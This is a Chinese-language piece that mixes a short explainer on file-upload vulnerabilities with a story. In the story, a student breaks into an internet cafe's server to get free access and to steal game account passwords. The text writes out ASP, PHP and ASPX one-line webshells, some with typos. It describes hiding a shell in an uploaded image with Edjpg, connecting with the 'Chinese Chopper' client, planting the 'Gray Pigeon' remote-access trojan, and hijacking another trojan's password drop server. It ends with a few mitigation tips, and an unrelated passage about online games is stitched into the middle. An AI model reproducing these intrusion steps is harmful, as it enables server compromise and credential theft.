攻击者上传了一个可执行文件如木马、病毒、恶意脚本、webShell等到服务器执行,并最终获得网站控制权限的漏洞。
这种漏洞产生的原因是程序员未对上传的文件进行严格地验证和过滤,导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。
1. 如果上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,导致代码执行;
2. 如果上传的文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为;
3. 如果上传的文件是病毒、木马文件,黑客可以诱骗用户或者管理员下载执行。
大学周围常见的网吧,主要面向大学生提供服务。
尽管赵南北已经拥有自己的个人电脑,但在宿舍玩游戏时,仍无法享受到那种人声鼎沸的氛围。
赵南北偶尔也要到附近的网吧消费一下,回忆那些通宵的岁月。
网吧桌面系统设有留言功能。
在留言之后,用户还可以上传自己制作的表情包。
在网络安全专业有一定经验的赵南北发现了这个可以被利用的漏洞。
通过一句话木马入侵网吧服务器,将自己的账号设置为管理员组成员,从此以后可以免费上网。
赵南北不担心被网管发现。
因为网管只会将电脑开机,使用个杀毒软件,没有什么网络技术。
确定目标后,就可以开始行动了。
编写一句话木马。
Asp一句话:<%eval request(“xxx”)%>
php 一句话:<%php @eval($_poSt[xxx]);?>
Aspx一句话:<%@ page Languag\\u003d”xxx”%><%eval(Request.Item[“xxx”])%>
保存为“表情包.asp”
请问想要选择一张什么样的图片呢?
使用Edjpg.exe将\\\"表情包.asp\\\"与图片结合到一起。
之后发表留言,并将合成后的图片上传。
留言成功之后,我们等待着服务器的反馈。
启动自己u盘中“中国菜刀”软件,然后在地址栏中输入留言区图片的地址。
连接成功后,可以使用三种shell:文件管理、数据库管理和虚拟终端。
文件管理:即“资源管理器”,可对web服务器所在分区的各种资源进行管理。
数据库管理是指“数据库客户端”,可以对web后台数据库进行管理。
获得web服务器的cmd shell,可以通过虚拟终端实现。
之后,我将“灰鸽子”上传到网吧的服务器里面。
在网吧服务器中,发现了盗号木马的控制端。
梦幻西游、地下城与勇士、cSGo等,这些都是非常受欢迎的游戏。
梦幻西游是一款经典的mmoRpG游戏,具有浓厚的中国文化背景,玩家可以选择各种职业,打造自己的梦幻装备。
地下城与勇士是一款动作冒险游戏,以地下城为背景,玩家需要探索各种危险和挑战,并与各种怪物战斗。
cSGo是一款竞技射击游戏,由Valve corporation开发,玩家需要与全球其他玩家竞争,争夺胜利。
盗号的主要收入来源是出售装备和金币。
网吧被盗号,大概率是由网管所导致。
网管的月薪不过几千元,但是盗号洗装备月收入轻松过万。
在一些较大的网吧中,倒卖游戏装备一天可以轻松达到数万元的收入。
\\\"在风口里,猪都能飞起来!\\\"
“黑吃黑!”赵南北看到盗号木马的控制端后,有了一个成熟的想法。
将盗号木马“收信”的网站换成自己的建立的网站。
被盗账号的密码会在自己服务器上被上传。
可以采取以下措施:
1. 对上传的文件进行严格的验证和过滤,包括限制文件类型和后缀;
2. 使用随机数存储文件,防止多后缀引起的漏洞;
3. 判断文件类型时,可以结合使用mImE type、后缀检查等方式。